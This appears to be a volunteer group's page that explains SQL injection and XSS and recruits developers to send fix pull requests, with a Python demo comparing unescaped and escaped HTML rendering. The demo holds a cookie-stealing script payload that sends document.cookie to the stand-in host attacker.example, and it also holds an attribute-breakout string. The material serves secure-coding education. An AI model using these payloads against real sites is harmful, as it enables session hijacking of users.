Web developers are almost entirely self-taught; even if they attended university for a computer science degree, it is almost certain they never had a course teach them about XSS or SQL injection.
We aim to seek out developers who are unwittingly making fatal mistakes, and educate them so they may continue on a path towards being a great programmer.
Because examples are the best way to educate, our lessons take the form of pull requests: it is the combination of background information and a concrete, applied fix that we expect to produce results.
Every now and then someone points out that GitHub's code search can be used to find many extremely vulnerable programs. The reaction is usually 95% "glad I'm not that stupid" and 5% "look at me taking advantage of them".
As a community of professionals, we're better than that. We should recognize that most errors come from ignorance, not lack of intelligence, and attack the problem as such. Plus, being mean is just not cool. Don't be a dick.
SQL injection: allowing user data to flow into your database queries without parameterization (concatenated straight into the SQL string), so an attacker can run arbitrary statements against your database.
See bobby-tables.com for more information on how to avoid this with parameterized queries in different languages.
A cross-site scripting (XSS) vulnerability allows an attacker to execute arbitrary JavaScript in your users' browsers, in the context of your site, when they visit a particular page. They can use this for a number of attacks; for instance, sending users' session cookies to a remote server, where the attacker collects them and uses them to log in as those users.
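The following is an added example, not code from the original page or from any project PEF has fixed. It uses Python's built-in html module and constructed inputs (the `render_*` function names, the "attacker.example" host and the payload strings are assumptions for the demo) to show unescaped interpolation of user content into HTML beside the escaped form, in two contexts: the page body, where the cookie-stealing payload described above lands, and a quoted attribute, where a different payload breaks out of the attribute instead.

```python
import html

# Constructed attacker payload for the page body: loads an image from a host
# the attacker controls, with the victim's cookies appended to the URL.
COOKIE_THIEF = (
    '<script>new Image().src="https://attacker.example/c?"'
    "+document.cookie</script>"
)

# Constructed attacker payload for a double-quoted attribute: closes the
# value, adds an event handler, and reopens a quote to swallow the rest.
ATTRIBUTE_BREAKOUT = '" autofocus onfocus="alert(document.cookie)'


def render_comment_vulnerable(author, text):
    """Vulnerable: untrusted strings interpolated straight into HTML."""
    return '<div class="comment"><b>%s</b>: %s</div>' % (author, text)


def render_comment_safe(author, text):
    """Fixed: html.escape turns < > & " ' into entities, so the browser
    renders the input as text rather than parsing it as markup."""
    return '<div class="comment"><b>%s</b>: %s</div>' % (
        html.escape(author, quote=True),
        html.escape(text, quote=True),
    )


def render_search_box_vulnerable(query):
    """Vulnerable: a quote in the input ends the value attribute early."""
    return '<input type="text" name="q" value="%s">' % query


def render_search_box_safe(query):
    """Fixed: quote=True is what keeps this safe inside an attribute;
    html.escape(s, quote=False) would leave the double quote alone."""
    return '<input type="text" name="q" value="%s">' % html.escape(query, quote=True)


def demo():
    return {
        "comment_vulnerable": render_comment_vulnerable("mallory", COOKIE_THIEF),
        "comment_safe": render_comment_safe("mallory", COOKIE_THIEF),
        "search_vulnerable": render_search_box_vulnerable(ATTRIBUTE_BREAKOUT),
        "search_safe": render_search_box_safe(ATTRIBUTE_BREAKOUT),
    }


if __name__ == "__main__":
    for name, markup in demo().items():
        print("%-18s %s" % (name, markup))
```

Escaping is context-specific: html.escape is correct for text nodes and double-quoted attribute values, but content placed inside a `<script>` block, a URL, or a CSS rule needs that context's own encoder, and a template engine that escapes by default removes the need to remember this on every line. Marking the session cookie HttpOnly keeps `document.cookie` from exposing it, which limits the damage of the payload above but does not fix the XSS itself.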
Interested in helping? Open an issue on the volunteers repository and we'll add you to the organization. Please list any language-groups you'd like to be a part of (e.g. PHP) if you'd like to get pinged periodically for advice.
Once you're a part of the organization, find a project with a problem and fork it to PEF. Fix the problem, send in a pull request, and feel good about yourself. See our first pull request for an example of the type of thing we're looking for.